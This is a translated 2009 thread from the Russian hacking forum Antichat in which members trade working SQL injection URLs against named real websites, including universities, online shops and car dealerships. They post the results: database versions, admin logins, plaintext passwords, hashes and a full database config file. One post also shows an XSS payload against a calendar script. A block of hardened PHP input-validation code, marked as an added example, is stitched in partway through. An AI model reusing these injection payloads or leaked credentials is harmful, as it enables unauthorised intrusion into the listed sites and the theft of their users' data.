ANTICHAT - a forum on information security, OSINT and technology
ANTICHAT is a Russian-language community on security, OSINT and programming.
The forum previously ran on the domains antichat.ru, antichat.com and antichat.club,
and is now available again at a new address:
forum.antichat.xyz.
The forum has been restored and continues to develop: archived threads are available, and new discussions and materials are being added.

03.05.2009, 22:37
Reservists Of Antichat - Level 6
http://www.armchair.ie/tell_friend.php?id=-1+union+select+1,2,concat_ws(0x3a,ve rsion(),data base(),u ser()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30--
5.0.51a-3ubuntu5.4-log:armchair:armchair@localhost
PR: 2

03.05.2009, 22:37
Banned
Xss&Sql-inj in a calendar script
2) Characteristic feature: a link of the form /news/?_Year=2009&_Month=4&_Day=10
3) news/?_Year=2009&_Month=4'&_Day=10 sql-inj
4) news/?_Year=2009&_Month=4</script><script>alert(/xss/)</script>&_Day=10
The vulnerable script itself:
Code:
<?
global $DOCUMENT_ROOT;
$DOCUMENT_ROOT = $_SERVER['DOCUMENT_ROOT'];
include "$DOCUMENT_ROOT/manage/inc/all.php";
if (!((isset($_Year)) && (isset($_Month)) && (isset($_Day)) && (isset($id))))
print 'Ошибка календаря';
else
{
$id = content_get_initial($id);
$iface = content_lookup_id($id);
$Months = array ("","is_January", "is_February", "is_March", "is_April", "is_May", "is_June", "is_July", "is_August", "is_September", "is_October", "is_November", "is_December");
$DoDays = array (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31);
$LDoDays = array (31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31);
$p_m = $iface->GetPredYM($_Month,$_Year);
$p_m = explode('_',$p_m);
$n_m = $iface->GetNextYM($_Month,$_Year);
$n_m = explode('_',$n_m);
$prev_Month = mktime (0,0,0,$p_m[0], 1, $p_m[1]);
$next_Month = mktime (0,0,0,$n_m[0], 1, $n_m[1]);
//$prev_Month = mktime (0,0,0,$_Month-1, 1, $_Year);
//$next_Month = mktime (0,0,0,$_Month+1, 1, $_Year);
$MaxDay = date("t",mktime (0,0,0,$_Month, 1, $_Year));
$prev_MaxDay = date("t",$prev_Month);
$next_MaxDay = date("t",$next_Month);
$firstYM = explode('-', $iface->GetFirstYM());
$lastYM = explode('-', $iface->GetLastYM());
?>
<div id="months"><?if (!(($_Month==$firstYM[1]) && ($_Year==$firstYM[0]))) {?><a href="#" class="prev" onclick="get_request('/inc/calendar.php?_Year=<?=date("Y",$prev_Month)?>&_Month='+parseInt(<?=date("m",$prev_Month)?>,10)+'&_Day=0&id=<?=$id?><?=((isset($pub))? "&pub=".$pub: "")?>'); return false;"><img src="/pics/larr.gif" alt="<-" width="14" height="7"></a><?} else {?><a><img src="/pics/clear.gif" width="14" height="7"></a><?};?><?=$Months[$_Month]." ".$_Year?><?if (!(($_Month==$lastYM[1]) && ($_Year==$lastYM[0]))) {?><a href="#" class="next" onclick="get_request('/inc/calendar.php?_Year=<?=date("Y",$next_Month)?>&_Month='+parseInt(<?=date("m",$next_Month)?>,10)+'&_Day=0&id=<?=$id?><?=((isset($pub))? "&pub=".$pub: "")?>'); return false;"><img src="/pics/rarr.gif" alt="->" width="14" height="7"></a><?} else {?><a><img src="/pics/clear.gif" width="14" height="7"></a><?}?></div>
<table>
<tr>
<th>is_PN</th>
<th>is_VT</th>
<th>is_SR</th>
<th>is_CT</th>
<th>is_PT</th>
<th>is_SB</th>
<th>is_VS</th>
</tr>
<?
print '<tr>';
$weekdayfirst = date("w",mktime (0,0,0,$_Month, 1, $_Year));
if ($weekdayfirst=='0')
$weekdayfirst = 7;
$dayweek = $weekdayfirst-1;
$firstdate = $prev_MaxDay - $weekdayfirst+2;
for ($j=$firstdate;$j<=$prev_MaxDay;$j++)
print '<td class="empty">'.$j.'</td>';
for ($i=1;$i<=$MaxDay;$i++)
{
$dayweek=$dayweek+1;
if (($dayweek%7==1) && ($dayweek!=$weekdayfirst))
print '</tr>
<tr>';
if (($i==date("d")) && ($_Month==date("m")) && ($_Year==date("Y")))
{
if (($iface->IsThisDatePub($_Year,$_Month,$i)) && ((isset($pub)) || ($i!=$_Day)))
print '<td class="current"><a href=".?_Year='.$_Year.'&_Month='.$_Month.'&_Day='.$i.'">'.$i.'</a></td>';
else
print '<td class="current">'.$i.'</td>';
}
elseif (($iface->IsThisDatePub($_Year,$_Month,$i)) && ((isset($pub)) || ($i!=$_Day)))
print '<td><a href=".?_Year='.$_Year.'&_Month='.$_Month.'&_Day='.$i.'">'.$i.'</a></td>';
else
print '<td>'.$i.'</td>';
}
$j=0;
while ($dayweek%7>=1)
{
$dayweek=$dayweek+1;
$j=$j+1;
print '<td class="empty">'.$j.'</td>';
}
print '</tr>';
?>
</table>
<?
}
?>
Last edited by [x59]ReV; 03.05.2009 at 22:45.
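A hardened way to handle the calendar parameters from the post above, shown as an added example that is not part of the original post or of the script's own code: the values are read explicitly from the request array instead of register_globals-style variables, validated as bounded integers before any use, passed to the database only through a bound parameter, and HTML-escaped on output. The helper names, the `news`/`pub_date` schema and the in-memory SQLite demo data are assumptions, since the page does not show the SQL behind `$iface`.

```php
<?php
// Added example; helper names and the news/pub_date schema are hypothetical (the page omits the SQL).

/** Read one parameter as a bounded integer; null if missing or malformed. */
function cal_int(array $src, string $key, int $min, int $max): ?int
{
    if (!isset($src[$key]) || !is_string($src[$key])) {
        return null; // absent, or an array such as _Month[]=1
    }
    $v = filter_var($src[$key], FILTER_VALIDATE_INT, ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

/** Validate _Year/_Month/_Day together; _Day=0 is the script's "no day" value. */
function cal_params(array $src): ?array
{
    $y = cal_int($src, '_Year', 1970, 2100);
    $m = cal_int($src, '_Month', 1, 12);
    $d = cal_int($src, '_Day', 0, 31);
    if ($y === null || $m === null || $d === null || ($d !== 0 && !checkdate($m, $d, $y))) {
        return null;
    }
    return ['_Year' => $y, '_Month' => $m, '_Day' => $d];
}

/** Parameterized stand-in for a lookup such as IsThisDatePub(). */
function is_date_published(PDO $db, int $y, int $m, int $d): bool
{
    $st = $db->prepare('SELECT 1 FROM news WHERE pub_date = :d LIMIT 1');
    $st->execute([':d' => sprintf('%04d-%02d-%02d', $y, $m, $d)]);
    return $st->fetchColumn() !== false;
}

/** URL-encode the query string, then HTML-escape it for the href attribute. */
function day_link(array $p, int $day): string
{
    $qs = http_build_query(['_Year' => $p['_Year'], '_Month' => $p['_Month'], '_Day' => $day]);
    return '<a href="' . htmlspecialchars('.?' . $qs, ENT_QUOTES, 'UTF-8') . '">' . $day . '</a>';
}

// Constructed demo data: in-memory SQLite stands in for the real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE news (pub_date TEXT); INSERT INTO news VALUES ('2009-04-10')");

$requests = [
    ['_Year' => '2009', '_Month' => '4', '_Day' => '10'],   // ordinary link (item 2)
    ['_Year' => '2009', '_Month' => "4'", '_Day' => '10'],  // item 3
    ['_Year' => '2009', '_Month' => '4</script><script>alert(/xss/)</script>', '_Day' => '10'], // item 4
];
foreach ($requests as $get) {
    $p = cal_params($get);
    if ($p === null) {
        echo "rejected\n";
        continue;
    }
    $pub = is_date_published($db, $p['_Year'], $p['_Month'], $p['_Day']);
    echo ($pub ? day_link($p, $p['_Day']) : (string) $p['_Day']), "\n";
}
```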

03.05.2009, 23:02
Forum member
http://www.uark.edu/ua/wxl02/report.php?trm=-99999+union+select+version(),2,3,4,5,6,7,8--
Database Version: 5.0.75-log
--------------------------------------------------------------------
http://artdesign.calpoly.edu/alumni.php?year=-99999+union+select+1,2,3,4,5,6,7,8,9,concat_ws
(0x3a,user,password),11,12+from+mysql.user--
root:wusthof
--------------------------------------------------------------------
http://nkuconnections.nku.edu/detail.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN +('VwDictionary','dtproperties','sysconstraints',' syssegments','TblAbout','tblBuildingCodes','tblCat egory','TblCustom','TblCustomFields','tblEvents',' tbleventshack','tbleventshack2','TblLog','tblPartI ','tblPartII','tblPartIII','tblPartIV','tblPhotos' ,'tblSchedules','tblSecurity','vwevents','vwListEv ents'))

03.05.2009, 23:41
Reservists Of Antichat - Level 6
Free TV (I'm thinking of having some fun with update)
http://www.freetv.fr/tv.php?id=1+union+select+1,2,concat_ws(0x3a,ve rsion(),datab ase(),us er()),4,5,6,7,8,9,10,11,12--
5.0.68-log:freetvsql:freetvsql@10.0.65.48
PR: 2

03.05.2009, 23:59
Forum member
A couple more shops...
ec.kyict.com.tw
Code:
http://ec.kyict.com.tw/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/*
admin:hi7410
Tables:
Code:
http://ec.kyict.com.tw/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_name,8%20from%20information_schema.tables/*
A piece of the dump of the users table:
Admin panel:
Code:
http://ec.kyict.com.tw/admin/index.php
Login: admin
Pass: hi7410
OS: WINDOWS
PR:0
www.mjholly.com
Code:
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_name,8%20from%20information_schema.tables/*
config.php
Code:
<?php
// database host
$db_host = "localhost:3306";
// database name
$db_name = "vhost15459-1";
// database username
$db_user = "vhost15459";
// database password
$db_pass = "phoebe";
// table prefix
$prefix = "ecs_";
$timezone = "Asia/Shanghai";
$cookie_path = "/";
$cookie_domain = "";
$admin_dir = "admin";
$session = "1440";
?>
Admin
Code:
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/*
mok579:a4836cd6d94d73eac97cdff2c47aab5f:jerry@mjho lly.com
Users:
Code:
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c),8%20from%20ecs_users/*
A piece of the dump from the users table:
PR:2

04.05.2009, 07:42
Forum member
Armand Group
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,database(),user (),version()),4,5,6,7,8,9,10§ion=archive
Code:
u30316_cadillac:u30316@10.10.11.124:5.0.51-log
http://www.armand-chevrolet.ru/company/news/article/?id=19+union+select+1,2,concat_ws(0x3a,database(), user(),version()),4,5,6,7,8,9,10,11,12,13,14,15&se ction=new
Code:
u30316_chevrolet:u30316_chevrolet@10.10.11.124:5.0.51-log
http://www.armand-hummer.ru/news/newsitem.php?id=16+and+1=2+union+select+1,2,concat _ws(0x3a,database(),user(),version()),4,5,6,7,8,9, 10§ion=new
Code:
u30316_hummer:u30316@10.10.11.124:5.0.51-log
http://www.armand-opel.ru/company/news/article/?id=15+union+select+1,2,concat_ws(0x3a,database(), user(),version()),4,5,6,7,8,9,10,11,12,13,14,15&se ction=new
Code:
u30316_opel:u30316_opel@10.10.11.124:5.0.51-log
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,username,passwo rd,email),4,5,6,7,8,9,10+from+u30316.vb_user+limit +x,1
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,hash,access),4, 5,6,7,8,9,10+from+u30316_cad_stat.cns_adminsession s
Code:
13ca4314d25cb955c1228a4393b77c54:admin

04.05.2009, 10:46
Reservists Of Antichat - Level 6
http://www.otoplenie.eu/php/firm_profiles.html?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,data base(),user(),ver sion()),8,9,10,11,12,13,14,15,16,17,18,19,20,21--
otopleni_otoplenie  topleni_otoplen@localhost:5.0. 67-community
------------------------------------------------------------------------
http://travelexpresbg.com/page.php?id=-1+union+select+1,concat_ws(0x3a,dat abase(),u ser(),versi on())--
travelex_te:travelex_te@localhost:5.0.67-community-log
Last edited by HAXTA4OK; 04.05.2009 at 10:51.

04.05.2009, 10:55
Newbie
Continuing the shop topic -
Code:
http://www.vostart.com/web/eng/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/*

04.05.2009, 11:56
Reservists Of Antichat - Level 6
[PR 4]
Code:
http://www.wedasoft.at/en/product.php?id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
4.1.15-Debian_0.dotdeb.4-log:wedasoft:wedas@localhost
[PR 3]
Code:
http://zonadostupa.ru/product.php?id=5814+union+select+concat_ws(0x3a,version(),database(),user())
4.1.22-log:wwwzonadostuparu:zonado02@fe30.hc.ru

04.05.2009, 12:20
Reservists Of Antichat - Level 6
http://www.arcadi.fr/rendezvous/rv.php?id=-1'+union+select+1,2,concat_ws(0x3a,database(),use r(),versio n()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23/*
arcadi_web2:arcadi_web2@bizmachine8.co.fr.clara.ne t:5.0.33-log
PR: 6